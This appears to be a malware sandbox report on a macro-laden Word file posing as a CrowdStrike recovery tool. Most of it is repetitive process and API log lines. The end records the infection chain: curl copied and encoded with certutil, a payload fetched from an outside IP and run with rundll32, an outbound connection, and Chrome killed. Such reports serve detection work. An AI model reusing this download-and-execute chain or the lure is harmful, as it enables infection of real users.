Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\taskkill.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\taskkill.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\taskkill.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\taskkill.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\rundll32.exeCode function: GetAdaptersInfo,_Smanip,
Source: C:\Users\user\AppData\Local\Temp\curl.exeDecision node followed by non-executed suspicious API: DecisionNode, Non Executed (send or recv or WinExec)
Source: C:\Windows\SysWOW64\certutil.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\mscorsvc.dll
Source: C:\Users\user\AppData\Local\Temp\curl.exeAPI coverage: 5.4 %
Source: C:\Users\user\AppData\Local\Temp\curl.exeAPI coverage: 9.1 %
Source: C:\Windows\System32\rundll32.exe TID: 6552Thread sleep count: 82 > 30
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\rundll32.exeCode function: 16_2_00007FFD92C0B230 _Bitmask_includes,operator&=,_Bitmask_includes,_Bitmask_includes,operator&=,_Bitmask_includes,GetFileAttributesExW,GetLastError,FindFirstFileW,GetLastError,FindClose,operator&=,std::_Fs_file::_Fs_file,Concurrency::details::_CriticalNonReentrantLock::_Scoped_lock::~_Scoped_lock,_Bitmask_includes,GetFileInformationByHandleEx,GetLastError,Concurrency::details::_CriticalNonReentrantLock::_Scoped_lock::~_Scoped_lock,operator&=,_Bitmask_includes,GetFileInformationByHandleEx,GetLastError,Concurrency::details::_CriticalNonReentrantLock::_Scoped_lock::~_Scoped_lock,operator&=,_Bitmask_includes,GetFileInformationByHandleEx,GetLastError,Concurrency::details::_CriticalNonReentrantLock::_Scoped_lock::~_Scoped_lock,operator&=,Concurrency::details::_CriticalNonReentrantLock::_Scoped_lock::~_Scoped_lock,Concurrency::details::_CriticalNonReentrantLock::_Scoped_lock::~_Scoped_lock,
Source: C:\Windows\System32\rundll32.exeCode function: 16_2_00007FFD92C0B1C0 __std_fs_close_handle,FindFirstFileExW,GetLastError,
Source: C:\Windows\System32\rundll32.exeCode function: 16_2_00007FFD92BF18C0 FindFirstFileW,new,delete,delete,std::_Lockit::_Lockit,std::_Lockit::~_Lockit,delete,delete,delete,FindNextFileW,FindClose,delete,delete,
Source: C:\Windows\System32\rundll32.exeCode function: 16_2_00007FFD92CCDD10 type_info::_name_internal_method,FindFirstFileExW,Concurrency::details::_Scheduler::_Scheduler,std::_Container_base12::~_Container_base12,std::_Container_base12::~_Container_base12,std::_Container_base12::~_Container_base12,std::_Container_base12::~_Container_base12,std::_Container_base12::~_Container_base12,std::_Container_base12::~_Container_base12,FindNextFileW,std::_Container_base12::~_Container_base12,std::_Container_base12::~_Container_base12,
Source: C:\Windows\System32\rundll32.exeCode function: 16_2_00007FFD92C95E80 GetSystemInfo,
Source: C:\Windows\System32\rundll32.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\Theme Colors\
Source: C:\Windows\System32\rundll32.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\
Source: C:\Windows\System32\rundll32.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\
Source: C:\Windows\System32\rundll32.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\
Source: C:\Windows\System32\rundll32.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\
Source: C:\Windows\System32\rundll32.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\
Source: document.xmlBinary or memory string: </w:t></w:r><w:r w:rsidRPr="0065064B"><w:rPr><w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/><w:b/><w:bCs/><w:color w:val="333333"/></w:rPr><w:t>Hyper-V Settings</w:t></w:r><w:r w:rsidRPr="0065064B"><w:rPr><w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/><w:color w:val="333333"/></w:rPr><w:t>
Source: document.xmlBinary or memory string: </w:t></w:r><w:r w:rsidRPr="0065064B"><w:rPr><w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/><w:b/><w:bCs/><w:color w:val="333333"/></w:rPr><w:t>Hyper-V settings</w:t></w:r><w:r w:rsidRPr="0065064B"><w:rPr><w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/><w:color w:val="333333"/></w:rPr><w:t>
Source: rundll32.exe, 00000010.00000002.5553191262.0000020A783B3000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000024.00000003.4258778994.0000027F6C3D1000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000024.00000002.4259308541.0000027F6C3D8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
Source: document.xmlBinary or memory string: </w:t></w:r><w:hyperlink r:id="rId9" w:tgtFrame="_self" w:history="1"><w:r w:rsidRPr="0065064B"><w:rPr><w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/><w:color w:val="146CAC"/><w:u w:val="single"/></w:rPr><w:t>https://go.microsoft.com/fwlink/?linkid=2280386</w:t></w:r></w:hyperlink><w:r w:rsidRPr="0065064B"><w:rPr><w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/><w:color w:val="333333"/></w:rPr><w:t>. In this document, we include detailed recovery steps for Windows client, servers, and OS's hosted on Hyper-V. The two repair options are as follows:</w:t></w:r></w:p><w:p w14:paraId="49DFB7AB" w14:textId="77777777" w:rsidR="0065064B" w:rsidRPr="0065064B" w:rsidRDefault="0065064B" w:rsidP="0065064B"><w:pPr><w:numPr><w:ilvl w:val="0"/><w:numId w:val="5"/></w:numPr><w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/><w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="259" w:lineRule="auto"/><w:jc w:val="both"/><w:rPr><w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/><w:color w:val="333333"/></w:rPr></w:pPr><w:r w:rsidRPr="0065064B"><w:rPr><w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/><w:b/><w:bCs/><w:color w:val="333333"/></w:rPr><w:t>Recover from WinPE</w:t></w:r><w:r w:rsidRPr="0065064B"><w:rPr><w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/><w:color w:val="333333"/></w:rPr><w:t>
Source: curl.exe, 0000000D.00000003.2188986234.00000000033F0000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 0000000D.00000003.2189060757.00000000033F3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllG
Source: document.xmlBinary or memory string: </w:t></w:r></w:p><w:p w14:paraId="70D69DE5" w14:textId="77777777" w:rsidR="0065064B" w:rsidRPr="0065064B" w:rsidRDefault="0065064B" w:rsidP="0065064B"><w:pPr><w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/><w:jc w:val="both"/><w:rPr><w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/><w:color w:val="333333"/></w:rPr></w:pPr><w:r w:rsidRPr="0065064B"><w:rPr><w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/><w:b/><w:bCs/><w:color w:val="333333"/></w:rPr><w:t>Steps to Recover Hyper-V virtual machines</w:t></w:r></w:p><w:p w14:paraId="74745A04" w14:textId="77777777" w:rsidR="0065064B" w:rsidRPr="0065064B" w:rsidRDefault="0065064B" w:rsidP="0065064B"><w:pPr><w:numPr><w:ilvl w:val="0"/><w:numId w:val="10"/></w:numPr><w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/><w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="259" w:lineRule="auto"/><w:jc w:val="both"/><w:rPr><w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/><w:color w:val="333333"/></w:rPr></w:pPr><w:r w:rsidRPr="0065064B"><w:rPr><w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/><w:color w:val="333333"/></w:rPr><w:t>On an impacted virtual machine, add a DVD Drive under
Source: rundll32.exe, 00000010.00000003.2451014222.0000020A783B4000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000010.00000003.2540593407.0000020A783B4000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000010.00000003.2416797193.0000020A783B3000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000010.00000003.2550439735.0000020A783B4000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000010.00000003.2500142406.0000020A783B3000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000010.00000003.2430247545.0000020A783B4000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000010.00000003.2257877794.0000020A783B3000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000010.00000003.2479616705.0000020A783B3000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000010.00000003.2461554328.0000020A783B3000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000010.00000003.2429834267.0000020A783B3000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000010.00000003.2510194846.0000020A783B4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: document.xmlBinary or memory string: </w:t></w:r></w:p><w:p w14:paraId="5A9C771D" w14:textId="77777777" w:rsidR="0065064B" w:rsidRPr="0065064B" w:rsidRDefault="0065064B" w:rsidP="0065064B"><w:pPr><w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/><w:jc w:val="both"/><w:rPr><w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/><w:color w:val="333333"/></w:rPr></w:pPr><w:r w:rsidRPr="0065064B"><w:rPr><w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/><w:b/><w:bCs/><w:color w:val="333333"/></w:rPr><w:t>Using recovery media on Hyper-V virtual machines</w:t></w:r><w:r w:rsidRPr="0065064B"><w:rPr><w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/><w:color w:val="333333"/></w:rPr><w:t xml:space="preserve"> The recovery media can be used to remediate impacted Hyper-V virtual machines. To do so, select the option to generate an ISO when creating the recovery media using the steps above. For non-Hyper-V virtual machines, follow instructions provided by your hypervisor vendor to utilize the recovery media.</w:t></w:r></w:p><w:p w14:paraId="3F927671" w14:textId="77777777" w:rsidR="0065064B" w:rsidRPr="0065064B" w:rsidRDefault="0065064B" w:rsidP="0065064B"><w:pPr><w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/><w:jc w:val="both"/><w:rPr><w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/><w:color w:val="333333"/></w:rPr></w:pPr><w:r w:rsidRPr="0065064B"><w:rPr><w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/><w:color w:val="333333"/></w:rPr><w:t>
Source: rundll32.exe, 00000010.00000003.2238753292.0000020A783B3000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000010.00000003.2238844395.0000020A783B4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll00
Source: document.xmlBinary or memory string: s Hyper-V settings.</w:t></w:r></w:p><w:p w14:paraId="4A7B9EB4" w14:textId="77777777" w:rsidR="0065064B" w:rsidRPr="0065064B" w:rsidRDefault="0065064B" w:rsidP="0065064B"><w:pPr><w:numPr><w:ilvl w:val="0"/><w:numId w:val="14"/></w:numPr><w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/><w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="259" w:lineRule="auto"/><w:jc w:val="both"/><w:rPr><w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/><w:color w:val="333333"/></w:rPr></w:pPr><w:r w:rsidRPr="0065064B"><w:rPr><w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/><w:color w:val="333333"/></w:rPr><w:t>Reboot normally.</w:t></w:r></w:p><w:p w14:paraId="0384424D" w14:textId="77777777" w:rsidR="0065064B" w:rsidRPr="0065064B" w:rsidRDefault="0065064B" w:rsidP="0065064B"><w:pPr><w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/><w:jc w:val="both"/><w:rPr><w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/><w:color w:val="333333"/></w:rPr></w:pPr><w:r w:rsidRPr="0065064B"><w:rPr><w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/><w:color w:val="333333"/></w:rPr><w:lastRenderedPageBreak/><w:t>
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information queried: ProcessInformation
Source: C:\Users\user\AppData\Local\Temp\curl.exeCode function: 13_2_008B155B IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
Source: C:\Users\user\AppData\Local\Temp\curl.exeCode function: 13_2_0087D33A GetModuleHandleA,GetProcAddress,_mbspbrk,LoadLibraryA,GetProcAddress,LoadLibraryExA,GetSystemDirectoryA,malloc,malloc,GetSystemDirectoryA,LoadLibraryA,free,free,
Source: C:\Windows\System32\taskkill.exeProcess token adjusted: Debug
Source: C:\Windows\System32\taskkill.exeProcess token adjusted: Debug
Source: C:\Users\user\AppData\Local\Temp\curl.exeCode function: 13_2_008B0CB4 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
Source: C:\Users\user\AppData\Local\Temp\curl.exeCode function: 13_2_008B155B IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
Source: C:\Users\user\AppData\Local\Temp\curl.exeCode function: 13_2_008B16BE SetUnhandledExceptionFilter,
Source: C:\Windows\System32\rundll32.exeCode function: 16_2_00007FFD92C91410 __crtCaptureCurrentContext,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
Source: C:\Windows\System32\rundll32.exeCode function: 16_2_00007FFD92C09FB0 SetUnhandledExceptionFilter,
Source: C:\Windows\System32\rundll32.exeCode function: 16_2_00007FFD92C09D50 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
Source: C:\Windows\System32\rundll32.exeCode function: 16_2_00007FFD92C08970 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
Source: C:\Users\user\AppData\Local\Temp\curl.exeCode function: 33_2_00880CB4 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
Source: C:\Users\user\AppData\Local\Temp\curl.exeCode function: 33_2_0088155B IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
Source: C:\Users\user\AppData\Local\Temp\curl.exeCode function: 33_2_008816BE SetUnhandledExceptionFilter,

HIPS / PFW / Operating System Protection Evasion

barindex
Source: C:\Windows\System32\rundll32.exeNetwork Connect: 172.104.160.126 5000
Source: New_Recovery_Tool_to_help_with_CrowdStrike_issue_impacting_Windows.docmOLE indicator, VBA stomping: true
Source: ~WRC0000.tmp.26.drOLE indicator, VBA stomping: true
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\xcopy.exe xcopy C:\Windows\System32\curl.exe C:\Users\user\AppData\Local\Temp
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\certutil.exe certutil -f -encode C:\Users\user\AppData\Local\Temp\curl.exe C:\Users\user\AppData\Local\Temp\curl.txt
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\certutil.exe certutil -f -decode C:\Users\user\AppData\Local\Temp\curl.txt C:\Users\user\AppData\Local\Temp\curl.exe
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\curl.exe C:\Users\user\AppData\Local\Temp\curl.exe http://172.104.160.126:8099/payload2.txt -o C:\Users\user\AppData\Local\Temp\mscorsvc.txt
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\certutil.exe certutil -f -encode C:\Users\user\AppData\Local\Temp\curl.exe C:\Users\user\AppData\Local\Temp\curl.txt
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32 C:\Users\user\AppData\Local\Temp\mscorsvc.dll,DllMain
Source: C:\Windows\System32\rundll32.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c taskkill /F /IM chrome.exe
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /F /IM chrome.exe
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\xcopy.exe xcopy C:\Windows\System32\curl.exe C:\Users\user\AppData\Local\Temp
